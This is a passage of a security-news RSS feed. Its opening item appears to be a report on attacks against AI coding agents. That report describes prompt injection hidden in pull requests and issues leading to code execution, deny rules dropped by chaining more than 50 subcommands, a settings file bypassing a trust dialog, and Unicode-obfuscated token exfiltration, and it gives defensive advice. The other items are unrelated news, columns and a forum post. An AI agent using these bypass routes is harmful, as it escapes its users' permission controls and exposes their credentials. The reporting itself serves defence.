Settings.json bypassed trust dialog (CVE-2026-33068). 50-subcommand chain dropped deny-rule enforcement.</p></td><td><p>Command chaining not validated. Settings loaded before trust. Deny rules truncated for performance.</p></td></tr><tr><td><p>Block prompt injection in code context</p></td><td><p>Copilot filters PR descriptions for known injection patterns.</p></td><td><p>Hidden injections in PRs, README files, and GitHub issues triggered RCE (CVE-2025-53773 + Orca RoguePilot).</p></td><td><p>Static pattern matching loses to embedded prompts in legitimate review and Codespaces flows.</p></td></tr><tr><td><p>Scope agent credentials to least privilege</p></td><td><p>Vertex AI Agent Engine uses P4SA service agent with OAuth scopes.</p></td><td><p>Default scopes reached Gmail, Calendar, Drive. P4SA credentials read every Cloud Storage bucket and Google’s Artifact Registry.</p></td><td><p>OAuth scopes non-editable by default. Least privilege violated by design.</p></td></tr><tr><td><p>Inventory and govern agent identities</p></td><td><p>No major AI coding agent vendor ships agent identity discovery or lifecycle management.</p></td><td><p>Not attempted. Enterprises do not inventory AI coding agents, their credentials, or their permission scopes.</p></td><td><p>AI coding agents are invisible to IAM, CMDB, and asset inventory. Zero governance exists.</p></td></tr><tr><td><p>Detect credential exfiltration from agent runtime</p></td><td><p>Codex obscures tokens in web portal view. Claude Code logs subcommands.</p></td><td><p>Tokens visible in cleartext inside containers. Unicode obfuscation hid exfil payloads. Subcommand chaining hid intent.</p></td><td><p>No runtime monitoring of agent network calls. Log truncation hid the bypass.</p></td></tr><tr><td><p>Audit AI-generated code for security flaws</p></td><td><p>Anthropic launched <a href="https://www.anthropic.com/news/claude-code-security">Claude Code Security</a> (Feb 2026). OpenAI launched <a href="https://www.axios.com/2026/03/06/openai-codex-security-ai-cyber">Codex Security</a> (March 2026).</p></td><td><p>Both scan generated code. Neither scans the agent’s own execution environment or credential handling.</p></td><td><p>Code-output security is not agent-runtime security. The agent itself is the attack surface.</p></td></tr></tbody></table><h2>Every exploit targeted runtime credentials, not model output</h2><p>Every vendor shipped a defense. Every defense was bypassed.</p><p>The <a href="https://www.sonarsource.com/resources/developer-survey-report/">Sonar 2026 State of Code Developer Survey</a> found 25% of developers use AI agents regularly, and 64% have started using them. <a href="https://www.veracode.com/blog/genai-code-security-report/">Veracode</a> tested more than 100 LLMs and found 45% of generated code samples introduced OWASP Top 10 flaws, a separate failure that compounds the runtime credential gap.</p><p>CrowdStrike CTO Elia Zaitsev framed the rule in an exclusive VentureBeat interview at RSAC 2026: <a href="https://venturebeat.com/security/rsac-2026-agent-identity-frameworks-three-gaps">collapse agent identities back to the human</a>, because an agent acting on your behalf should never have more privileges than you do. Codex held a GitHub OAuth token scoped to every repository the developer authorized. Vertex AI’s P4SA read every Cloud Storage bucket in the project. Claude Code traded deny-rule enforcement for token budget.</p><p>Kayne McGladrey, an IEEE Senior Member who advises enterprises on identity risk, made the same diagnosis in an exclusive interview with VentureBeat. "<a href="https://venturebeat.com/security/microsoft-salesforce-copilot-agentforce-prompt-injection-cve-agent-remediation-playbook">It uses far more permissions than it should have</a>, more than a human would, because of the speed of scale and intent."</p><p>Riemer drew the operational line in an exclusive VentureBeat interview. "It becomes, I don't know you until I validate you." The branch name talked to the shell before validation. The GitHub issue talked to Copilot before anyone read it.</p><h2>Security director action plan</h2><ol><li><p><b>Inventory every AI coding agent (CIEM).</b> Codex, Claude Code, Copilot, Cursor, Gemini Code Assist, Windsurf. List the credentials and OAuth scopes each received at setup. If your CMDB has no category for AI agent identities, create one.</p></li><li><p><b>Audit OAuth scopes and patch levels.</b> Upgrade Claude Code to 2.1.90 or later. Verify Copilot's August 2025 patch. Migrate Vertex AI to the bring-your-own-service-account model.</p></li><li><p><b>Treat branch names, pull request descriptions, GitHub issues, and repo configuration as untrusted input.</b> Monitor for Unicode obfuscation (U+3000), command chaining over 50 subcommands, and changes to .vscode/settings.json or .claude/settings.json that flip permission modes.</p></li><li><p><b>Govern agent identities the way you govern human privileged identities (PAM/IGA).</b> Credential rotation. Least-privilege scoping. Separation of duties between the agent that writes code and the agent that deploys it. CyberArk, Delinea, and any PAM platform that accepts non-human identities can onboard agent OAuth credentials today; <a href="https://www.gravitee.io/blog/state-of-ai-agent-security-2026-report-when-adoption-outpaces-control">Gravitee's 2026 survey</a> found only 21.9% of teams have done it.</p></li><li><p><b>Validate before you communicate.</b> "As long as we trust and we check and we validate, I'm fine with letting AI maintain it," Riemer said. Before any AI coding agent authenticates to GitHub, Gmail, or an internal repository, verify the agent's identity, scope, and the human session it is bound to.</p></li><li><p><b>Ask each vendor in writing before your next renewal.</b> "Show me the identity lifecycle management controls for the AI agent running in my environment, including credential scope, rotation policy, and permission audit trail." If the vendor cannot answer, that is the audit finding.</p></li></ol><h2><b>The governance gap in three sentences</b></h2><p>Most CISOs inventory every human identity and have zero inventory of the AI agents running with equivalent credentials. No IAM framework governs human privilege escalation and agent privilege escalation with the same rigor. Most scanners track every CVE but cannot alert when a branch name exfiltrates a GitHub token through a container that developers trust by default.</p><p>Zaitsev's advice to RSAC 2026 attendees was blunt: you already know what to do. Agents just made the cost of not doing it catastrophic.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers stole hundreds of thousands of Roblox accounts: Here’s what to do]]></title>
<description><![CDATA[Hackers used fake Roblox “game enhancements” to steal login details from hundreds of thousands of players, then sold the accounts for profit. This article has been indexed from Malwarebytes Read the original article: Hackers stole hundreds of thousands of Roblox…
Read more →
The post Hackers stol...]]></description>
<link>https://tsecurity.de/de/3478396/it-security-nachrichten/hackers-stole-hundreds-of-thousands-of-roblox-accounts-heres-what-to-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3478396/it-security-nachrichten/hackers-stole-hundreds-of-thousands-of-roblox-accounts-heres-what-to-do/</guid>
<pubDate>Thu, 30 Apr 2026 18:53:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hackers used fake Roblox “game enhancements” to steal login details from hundreds of thousands of players, then sold the accounts for profit. This article has been indexed from Malwarebytes Read the original article: Hackers stole hundreds of thousands of Roblox…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-stole-hundreds-of-thousands-of-roblox-accounts-heres-what-to-do/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-stole-hundreds-of-thousands-of-roblox-accounts-heres-what-to-do/">Hackers stole hundreds of thousands of Roblox accounts: Here’s what to do</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-33890 | Autodesk AutoCAD prior 2023.1.1 PCT File DesignReview.exe memory corruption]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Autodesk AutoCAD. This impacts an unknown function of the file DesignReview.exe of the component PCT File Handler. The manipulation results in memory corruption.

This vulnerability is known as CVE-2022-33890. It is possible to launch...]]></description>
<link>https://tsecurity.de/de/3475540/sicherheitsluecken/cve-2022-33890-autodesk-autocad-prior-202311-pct-file-designreviewexe-memory-corruption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3475540/sicherheitsluecken/cve-2022-33890-autodesk-autocad-prior-202311-pct-file-designreviewexe-memory-corruption/</guid>
<pubDate>Wed, 29 Apr 2026 20:50:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/autodesk:autocad">Autodesk AutoCAD</a>. This impacts an unknown function of the file <em>DesignReview.exe</em> of the component <em>PCT File Handler</em>. The manipulation results in memory corruption.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2022-33890">CVE-2022-33890</a>. It is possible to launch the attack remotely. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Images of Samsung's rumored smart glasses have leaked]]></title>
<description><![CDATA[Images and details about Samsung's upcoming smart glasses have leaked, according to a report by Android Headlines. We knew these were coming at some point, but we now have what could be actual photos and they look pretty nifty. The glasses are reportedly being developed under the codename "Jinju"...]]></description>
<link>https://tsecurity.de/de/3469148/it-nachrichten/images-of-samsungs-rumored-smart-glasses-have-leaked/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3469148/it-nachrichten/images-of-samsungs-rumored-smart-glasses-have-leaked/</guid>
<pubDate>Mon, 27 Apr 2026 20:46:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Images and details about Samsung's upcoming smart glasses have leaked, <a data-i13n="cpos:1;pos:1" href="https://www.androidheadlines.com/samsung-galaxy-glasses"><ins>according to a report by </ins><em><ins>Android Headlines</ins></em></a>. We knew these were <a data-i13n="cpos:2;pos:1" href="https://www.engadget.com/ar-vr/samsung-is-working-on-xr-smart-glasses-with-warby-parker-and-gentle-monster-042632170.html"><ins>coming at some point</ins></a>, but we now have what could be actual photos and they look pretty nifty. The glasses are reportedly being developed under the codename "Jinju" and could cost anywhere from $380 to $500.</p>
<p>These are the first smart glasses from Samsung and look to offer a similar feature set to stuff like <a data-i13n="cpos:3;pos:1" href="https://www.engadget.com/wearables/ray-ban-meta-2nd-gen-review-smart-glasses-are-finally-getting-useful-124720393.html"><ins>Meta Ray-Bans</ins></a> and the forthcoming <a data-i13n="cpos:4;pos:1" href="https://www.engadget.com/wearables/heres-how-google-is-laying-the-foundation-for-our-mixed-reality-future-180000716.html"><ins>Google Gemini glasses</ins></a>. Samsung's specs will run on the <a data-i13n="cpos:5;pos:1" href="https://blog.google/products-and-platforms/platforms/android/android-xr-immersive-features-update-april-2026/"><ins>Android XR wearables platform</ins></a> and will likely feature heavy integration with the Google Gemini chatbot.</p>
<span></span><div></div>
<p>It has been reported that these glasses will not feature a display, but that's likely coming with another pair in 2027. The second release is being developed under the codename "Haean" and will reportedly include a micro-LED display, allowing for similar functionality to something like the <a data-i13n="cpos:6;pos:1" href="https://www.engadget.com/wearables/meta-ray-ban-display-review-chunky-frames-with-impressive-abilities-193127070.html"><ins>Meta Ray-Ban Display glasses</ins></a>. These could cost anywhere from $600 to $900.</p>
<p>We don't know when the Jinju glasses will launch, but later this year is a safe bet. Samsung has a major <a data-i13n="cpos:7;pos:1" href="https://www.androidauthority.com/samsung-galaxy-z-fold-8-wide-unpacked-date-3656057/"><ins>Unpacked event scheduled for July</ins></a>. We could get some official details at that point, though it's unlikely the smart glasses will launch alongside stuff like the Galaxy Z Fold 8 and the Galaxy Watch 9.</p>
<p>It's far more likely we'll get a tease at that event, with a launch later in the year. This is what Samsung did with its <a data-i13n="cpos:8;pos:1" href="https://www.engadget.com/ar-vr/samsungs-galaxy-xr-doesnt-give-me-much-hope-for-android-xr-110000129.html"><ins>Galaxy XR virtual reality headset</ins></a> last year.</p>
<div></div>
<p>It's also been reported that the Jinju glasses will include a 12MP camera, a Snapdragon AR1 chip and directional speakers with bone-conduction tech. These specs are, of course, subject to change before launch. It's also highly possible the price will tick up beyond the aforementioned range, thanks to <a data-i13n="elm:affiliate_link;sellerN:The New York Times;elmt:;cpos:9;pos:1" href="https://shopping.yahoo.com/rdlw?merchantId=c813ae39-7d58-41cb-ac66-ad830606ceef&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=03ee2791-833d-434f-b2fa-3584d399d72d&amp;featureId=text-link&amp;merchantName=The+New+York+Times&amp;linkText=global+economic+uncertainty&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5ueXRpbWVzLmNvbS8yMDI2LzA0LzI3L2J1c2luZXNzL2Vjb25vbXkvaXJhbi13YXItZ2xvYmFsLWdyb3d0aC5odG1sIiwiY29udGVudFV1aWQiOiIwM2VlMjc5MS04MzNkLTQzNGYtYjJmYS0zNTg0ZDM5OWQ3MmQiLCJvcmlnaW5hbFVybCI6Imh0dHBzOi8vd3d3Lm55dGltZXMuY29tLzIwMjYvMDQvMjcvYnVzaW5lc3MvZWNvbm9teS9pcmFuLXdhci1nbG9iYWwtZ3Jvd3RoLmh0bWwifQ&amp;signature=AQAAAbf3tVmjRIakL__CcBo3Qrq_wMduI6iprVRunm1Jroqc&amp;gcReferrer=https%3A%2F%2Fwww.nytimes.com%2F2026%2F04%2F27%2Fbusiness%2Feconomy%2Firan-war-global-growth.html" class="rapid-with-clickid" data-original-link="https://www.nytimes.com/2026/04/27/business/economy/iran-war-global-growth.html"><ins>global economic uncertainty</ins></a> and the <a data-i13n="cpos:10;pos:1" href="https://www.engadget.com/ai/microsoft-raises-prices-on-surface-pcs-due-to-skyrocketing-ram-costs-181648588.html"><ins>rising costs of RAM and storage</ins></a>.</p>This article originally appeared on Engadget at https://www.engadget.com/ar-vr/images-of-samsungs-rumored-smart-glasses-have-leaked-184129483.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[You selected the right vendors. Now govern them like you mean it.]]></title>
<description><![CDATA[Waiting for your vendor to fix a program isn’t a strategy. It’s a cost, accumulating quietly while everyone in the room maintains the fiction that the process is working.



I’ve been in both rooms. The room where the client already knows something is wrong and needs the language and the evidence...]]></description>
<link>https://tsecurity.de/de/3467611/it-security-nachrichten/you-selected-the-right-vendors-now-govern-them-like-you-mean-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3467611/it-security-nachrichten/you-selected-the-right-vendors-now-govern-them-like-you-mean-it/</guid>
<pubDate>Mon, 27 Apr 2026 12:06:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Waiting for your vendor to fix a program isn’t a strategy. It’s a cost, accumulating quietly while everyone in the room maintains the fiction that the process is working.</p>



<p>I’ve been in both rooms. The room where the client already knows something is wrong and needs the language and the evidence to act, and the room where the client doesn’t know yet. The program feels manageable, the vendor is professional, the steering committee meetings run on time, and the warning signs are sitting in plain sight waiting for someone to name them.</p>



<p>That second room is the more important one. Because the window to act is still open. And most clients don’t move until it’s started to close.</p>



<h2 class="wp-block-heading">Warning signs most clients miss appear in design</h2>



<p>The earliest signal is rarely a missed milestone or a failed deliverable. It appears in language. When the phrase “path to green” starts appearing in status reports and steering committee decks, the program has already accepted it’s not green. It’s shifted from managing execution to managing the narrative.</p>



<p>Watch what the steering committee is actually doing. If it’s consistently hearing about what happened last month rather than what’s forecast for next month, leadership has been converted from a decision-making body into an audience. <a href="https://www.cio.com/article/4133234/does-vendor-influence-turn-into-cio-bias.html?utm=hybrid_search">The vendor controls the agenda</a>, the framing, and the cadence of what gets surfaced.</p>



<p>The most serious signal is when a program sponsor hears about material issues from their own direct reports that the vendor hasn’t raised in the room. That’s not a communication gap but a calculated decision about what leadership is ready to hear. When that pattern appears in SAP, Oracle, or Salesforce programs, the trust that makes the governance model function has already eroded.</p>



<p>When you see these signals, don’t wait for the next steering committee. Start demanding data that can be independently corroborated. Ask the vendor to forecast, not report. If they can’t tell you where the program will be in 60 days, they’re managing your perception, not your program.</p>



<h2 class="wp-block-heading">Your master conductor has a conflict of interest you’re not addressing</h2>



<p>A pattern I’ve seen consistently across multi-vendor programs involving Accenture, Deloitte, PwC, and others is the master conductor, or program integration coordinator, is quick to name client’s gaps, other vendors’ shortcomings, and third-party dependencies running behind. What they almost never do is name their own firm’s failures with the same directness in the same room.</p>



<p>That’s not a personality issue but a structural conflict. The firm serving as master conductor is delivering against its own statement of work (SOW), and the governance position gives them access to information, reporting authority, and narrative control they’ll use to, consciously or not, protect their own delivery track.</p>



<p>This is why I advise clients to treat the master conductor and program integration coordinator role as structurally separate from the vendor delivery role. That means a, entirely separate firm, an independent integrator with no delivery stake in the outcome. In practice, it’s more often a designated individual or a group within the project management or transformation office carved from one of the existing vendors, reporting directly to the client and accountable to the steering committee, not to their own firm’s <a href="https://www.cio.com/article/4120226/rethinking-it-leadership-to-unlock-the-agility-of-teamship.html?utm=hybrid_search">engagement leadership</a>.</p>



<p>There’s no true firewall in that model, but there’s a behavioral test. Watch what that role or team does with information that reflects badly on their own firm. Do they surface it or escalate it with the same urgency they bring to client gaps? Do they forecast problems on their own track, or only on everyone else’s?</p>



<p>A master conductor who’ll escalate failures that implicate their own delivery team is doing the job. One who only calls out the client and the other vendors is protecting the engagement.</p>



<p>Before the next SOW is signed, make it structural. Define the master conductor role separately from the delivery role, name the individual or team, set the reporting line directly to the client, and use the behavioral test to determine whether the role is being performed or merely filled.</p>



<h2 class="wp-block-heading">Waiting isn’t neutral</h2>



<p>The financial cost of waiting is more specific than most clients realize. In a multi-vendor environment where two or three system integrators are billing against active SOWs, every month of schedule extension carries a material cost, potentially millions to tens of millions of dollars per firm, not because scope expanded, but because governance didn’t hold the timeline.</p>



<p>The commercial exposure appears even earlier. When scope boundaries are unclear and the integrated plan is unstable, vendors have no reliable baseline to price against. The result is predictable: a significant spread between a time-and-materials estimate and a fixed fee quote for the same scope. That spread is not a pricing difference. It’s the vendor converting your governance uncertainty into their contract protection. The client absorbs it either way.</p>



<p>What makes the waiting feel reasonable is the vendor’s day-to-day team is usually professional and working hard. So the problem is authority and incentive, not effort. The program manager running the engagement can’t authorize additional resources nor commit spend across organizational lines. Their job is to manage the relationship, protect their firm’s margin, and keep the engagement profitable. Fixing your program isn’t the same job.</p>



<p>The window to act is real and short. A senior executive at the vendor can absorb costs, <a href="https://www.cio.com/article/4100412/it-talent-heres-how-cios-curate-engagement-and-retention.html?utm=hybrid_search">bring new talent</a>, and make commitments the delivery team has no authority to make. But that authority diminishes as the program ages. The more that’s been billed and the more scope has shifted, the harder it is for even a motivated senior executive to make the client whole. Clients who act in design or early build have options that clients who wait until three months before go-live don’t.</p>



<h2 class="wp-block-heading">The intervention that works is a leadership one</h2>



<p>When the signals are clear and the client is ready to act, the intervention that moves the needle isn’t a governance document or a scorecard meeting but a top-to-top conversation between client and vendor senior leadership. This includes execs who aren’t running the day-to-day program but have something personal at stake in the outcome.</p>



<p>That conversation works because it activates a different set of incentives. The vendor’s senior executive, the sector partner and industry leader whose name is on the relationship, needs your program to be referenceable. They don’t want a PR failure on a flagship engagement, nor do they want to explain to their firm’s leadership why a major client program collapsed. They have authority their delivery team doesn’t: power to assign their best resources, ability to absorb costs the SOW or change order doesn’t cover, and they can accelerate staffing decisions and make commitments that change what the program can do. They have skin in the game their team doesn’t.</p>



<p>Also, structure the engagement deliberately. Have senior executives on both sides and new talent brought in as a visible signal of vendor investment. And have a cadence that continues until the data shows the program is back on track, with time-bound accountability on both sides. And have explicit understanding that the relationship itself is under review, not just the program.</p>



<p>This is sustained leadership engagement, not a one-time meeting, and it doesn’t replace <a href="https://www.cio.com/article/4128980/the-struggle-for-good-ai-governance-is-real.html?utm=hybrid_search">the governance model</a>. It enforces it.</p>



<h2 class="wp-block-heading">The only recovery signal worth trusting</h2>



<p>When the top-to-top works, you’ll know it by what the vendor brings back to the table. Not reassurances or a revised plan with optimistic milestone dates, but facts about where they failed, what they’re changing, and, most critically, where the client has performance gaps that also need to close.</p>



<p>A vendor who comes back and accepts blame still manages the relationship. A vendor who says we failed here and here, these are the specific changes we’re making, and you have a gap here we need you to address, that vendor is engaged and mutually accountable. That’s the integrity test.</p>



<p>It runs both ways because program failure almost always does. Slow client decisions. Unavailable business resources. Requirements that shifted after design was locked. A vendor who names those things alongside their own failures isn’t deflecting, they’re investing in an outcome. That’s the signal the recovery is real.</p>



<p>If the executive meeting produces only promises and general commitment, keep the pressure on. Real engagement looks like specific admissions, named resources, and a willingness to hold the mirror up to both sides of the table.</p>



<h2 class="wp-block-heading">You hold the accountability. Be the human in the middle.</h2>



<p>Through all of it, the client holds the ultimate accountability. The master conductor holds the responsibility for execution and integration across the vendor ecosystem. That distinction isn’t administrative. It means the client can’t outsource their judgment, regardless of how rigorous the governance model looks on paper.</p>



<p>Think of it like the vendor can hallucinate. Not out of malice, but because every status report is a curated narrative produced by people whose compensation, future work, and professional reputation depend on how that narrative lands. The program deck isn’t neutral data, it’s information filtered through interests. What’s present tells you something. What’s absent, however, tells you more.</p>



<p>Be the human in the middle. Verify, cross-reference, ask questions the deck didn’t answer, and notice what’s missing as much as what’s there. If the steering committee is only hearing good news, that’s a sign someone is deciding what leadership is ready to hear, not that the program is running well.</p>



<p>Demand forecasts, not status reports. Look for hard evidence that can be independently corroborated. When the vendor names a client performance gap alongside their own, take it seriously. That’s the accountability model working the way it’s supposed to, not a deflection.</p>



<p>The warning signs may not always be apparent, though. The window is open, but won’t stay that way, so waiting isn’t a strategy<strong>.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The ‘manager of agents’: How AI evolves the SOC analyst role]]></title>
<description><![CDATA[Every SOC analyst has heard it by now: “AI is coming for your job”.



I hear it in conversations with SOC teams. I see it in the hesitation during evaluations. And increasingly, I feel it as a source of resistance — especially from the very people AI is supposed to help.



But the reality is th...]]></description>
<link>https://tsecurity.de/de/3467435/it-security-nachrichten/the-manager-of-agents-how-ai-evolves-the-soc-analyst-role/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3467435/it-security-nachrichten/the-manager-of-agents-how-ai-evolves-the-soc-analyst-role/</guid>
<pubDate>Mon, 27 Apr 2026 11:06:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Every SOC analyst has heard it by now: “AI is coming for your job”.</p>



<p>I hear it in conversations with SOC teams. I see it in the hesitation during evaluations. And increasingly, I feel it as a source of resistance — especially from the very people AI is supposed to help.</p>



<p>But the reality is the opposite.</p>



<p>Instead of eliminating the Tier 1 analyst role, AI is elevating it — from a job defined by repetitive tasks to one defined by judgment, oversight and decision-making. In short, it makes them more powerful as SOC commanders.</p>



<h2 class="wp-block-heading">The work was never the point</h2>



<p>To understand what’s changing, we need to be honest about the historical role of Tier 1 analysts.</p>



<p>In a <a href="https://www.csoonline.com/article/3840447/security-operations-centers-are-fundamental-to-cybersecurity-heres-how-to-build-one.html" target="_blank">typical SOC</a>, a Tier 1 analyst might spend 20–30 minutes investigating a single phishing alert — pivoting across email logs, endpoint data and threat intelligence tools, validating signals and documenting findings. It’s necessary work, but it’s also highly repetitive and time-consuming.</p>



<p>Modern security operations generate more data than humans can reasonably process. Investigating a single alert often requires pivoting across identity systems, endpoint telemetry, cloud logs and threat intelligence sources. Multiply that by hundreds or thousands of alerts per day, and you have a workload that is fundamentally misaligned with human capacity.</p>



<p>More importantly, SOC analysts are too talented for this kind of non-human work. For years, we’ve accepted this as the cost of doing business. AI changes that equation.</p>



<h2 class="wp-block-heading">From doing the work to directing it</h2>



<p>What agentic AI introduces into the SOC is the ability to delegate.</p>



<p>Instead of analysts manually gathering evidence and stitching together context, AI agents can now autonomously execute investigative steps: Querying systems, correlating signals and building evidence chains in real time. It doesn’t remove the human from the process. It elevates them within it.</p>



<p>The emerging model is one where analysts manage a system of agents — each responsible for a piece of the investigation — rather than performing each step themselves. The human role shifts from operator to orchestrator.</p>



<p>What I consistently hear from security leaders isn’t, “I need my analysts to move faster.” It’s, “I need my analysts to stop collecting data and start making decisions based on it.” Those are fundamentally different problems. And the gap between them is where AI creates the most value.</p>



<h2 class="wp-block-heading">The rise of the ‘manager of agents’</h2>



<p>This is where the Tier 1 role evolves — not disappears.</p>



<p>In this new model, entry-level analysts are effectively managing a swarm of AI agents. They are responsible for reviewing investigations, validating conclusions and ensuring actions align with business context and risk tolerance.</p>



<p>They are not <a href="https://www.csoonline.com/article/4136294/anthropics-claude-code-security-rollout-is-an-industry-wakeup-call.html" target="_blank">“in the loop”</a> for every step. They are “on the loop” — overseeing outcomes rather than executing tasks.</p>



<p>When analysts are forced to stay in the loop — checking every enrichment, every query, every intermediate step — they become a bottleneck. When they move on the loop, they can operate at scale, reviewing dozens or hundreds of investigations with the right level of oversight.</p>



<p>This is how trust in AI is built: Not by asking humans to verify everything, but by giving them the visibility to verify anything.</p>



<p>Transparency becomes the control plane. Analysts can see exactly what the AI did, how it reached a conclusion and where uncertainty exists. Over time, as accuracy proves out, they naturally increase their level of trust — just as they would with a new colleague joining the team.</p>



<h2 class="wp-block-heading">Why cybersecurity is different</h2>



<p>The fear of job displacement is understandable. In many industries, AI is reducing the need for entry-level roles. Cybersecurity is one of the few domains where AI won’t reduce work. It will expose how much work we’ve been unable to do.</p>



<p>The volume and complexity of threats are increasing faster than teams can scale. <a href="https://www.csoonline.com/article/4154222/6-ways-attackers-abuse-ai-services-to-hack-your-business.html" target="_blank">Attackers are already using AI to automate reconnaissance, generate code and accelerate exploitation</a>. Defenders don’t have the option to sit this out.</p>



<p>Threat hunting, detection engineering and control optimization have historically been under-resourced because teams were consumed by alert triage. When AI removes that burden, it creates much-needed capacity for analysts to do what they were trained to do. The work doesn’t shrink. The right work finally gets done.</p>



<h2 class="wp-block-heading">A new baseline for entry-level talent</h2>



<p>This shift also changes what we expect from entry-level analysts.</p>



<p>Historically, Tier 1 roles were designed as places where analysts learned by doing repetitive tasks. That model no longer makes sense when those tasks can be automated.</p>



<p>The baseline is moving toward understanding how AI systems operate: Interpreting their outputs, questioning their reasoning and guiding their behavior. Human-centric skills become more important, not less. Curiosity, critical thinking and the ability to connect disparate signals into a coherent narrative — these are the differentiators in an AI-driven SOC.</p>



<p>We’re already seeing organizations <a href="https://www.forbes.com/sites/joetoscano1/2026/02/18/corporate-america-is-rethinking-ai-workforce-needs-led-by-ibm/" target="_blank" rel="noreferrer noopener">rethink how they hire for these roles</a>. There is less emphasis on credentials and more on how someone thinks and solves problems. When AI handles the mechanics, judgment is the job.</p>



<h2 class="wp-block-heading">Building trust that holds</h2>



<p>If the future is so clear, why is there resistance? In most cases, it comes down to trust — and trust must be earned, not assumed.</p>



<p>The deployments I’ve seen fail share a common pattern: Organizations treat AI as a binary shift from no automation to full autonomy. That’s not how security teams work, and it’s not how they should be asked to work.</p>



<p>What works is a progression. Start with limited, high-confidence use cases. Provide full transparency into how the system reaches its conclusions. Let analysts validate outcomes before expanding the scope. And critically, put practitioners in the room. Not implementation consultants or project managers, but people who have run SOC shifts, triaged thousands of alerts and earned credibility the hard way.</p>



<p>This is why, when we deploy, we bring former SOC leads, threat hunters and detection engineers to work directly alongside analyst teams. They’re not there to configure software. They’re there to build trust in the system — because they’ve already earned trust from the people using it. When analysts see that the people helping them deploy this technology have lived the same grind, the conversation changes. It stops being “will this replace me” and starts being “how do I use this well.”</p>



<p>That shift in orientation — from threat to tool — is what separates a successful deployment from one that stalls.</p>



<p>The trust gap isn’t a technology problem. It’s a human one. And it closes the same way trust always closes: Through demonstrated competence, shared context and time.</p>



<h2 class="wp-block-heading">The future SOC is human-led</h2>



<p>The end state here is not an autonomous SOC with no humans involved. It’s a human-led SOC, powered by AI.</p>



<p>AI agents handle the labor-intensive, evidence-gathering aspects of security operations. Humans provide direction, oversight and accountability. Together, they operate at a speed and scale neither could achieve alone. That’s not a theory — it’s what’s happening in production environments today.</p>



<h2 class="wp-block-heading">Elevation, not elimination</h2>



<p>The narrative that AI will eliminate Tier 1 analysts misses the point. The role isn’t going away. It’s being redefined.</p>



<p>The analysts who succeed in this new environment will be those who can manage intelligence systems, interpret complex outputs and make high-quality decisions under uncertainty.</p>



<p>They won’t be replaced. They’ll be promoted.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Just got our audit back and a whooping 100% of apps had misconfigs]]></title>
<description><![CDATA[Audit landed on my desk last week. Every single application we tested had at least one security misconfiguration, yes every last one of them Then I read the OWASP 2025 and apparently were not special. 100% of apps tested across the whole dataset had the same problem. I mean 700k+ CWE occurrences ...]]></description>
<link>https://tsecurity.de/de/3466635/it-security-nachrichten/just-got-our-audit-back-and-a-whooping-100-of-apps-had-misconfigs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3466635/it-security-nachrichten/just-got-our-audit-back-and-a-whooping-100-of-apps-had-misconfigs/</guid>
<pubDate>Mon, 27 Apr 2026 03:51:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Audit landed on my desk last week. Every single application we tested had at least one security misconfiguration, yes every last one of them</p> <p>Then I read the OWASP 2025 and apparently were not special. 100% of apps tested across the whole dataset had the same problem. I mean 700k+ CWE occurrences in this category alone. </p> <p>Heres the part that's wrecking me though: detection isnt the problem. Our scanner found them, we have findings out the wazoo. What nobody can tell me is which of the 4,200 misconfigs flagged in our environment will get us breached and which ones are technically true but irrelevant bs.</p> <p>The auditor wanted a remediation plan, but a plan that treats all 4,200 the same is just a backlog with a deadline. What we need is reachability and blast radius, basically which misconfigs are on internet facing assets, which ones chain into sensitive data, which ones combine with an over permissioned role to become an attack path.</p> <p>How are folks handling this post-audit? Feels like the industry's stuck solving discovery while the problem moved years ago.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/MortgageWarm3770"> /u/MortgageWarm3770 </a> <br> <span><a 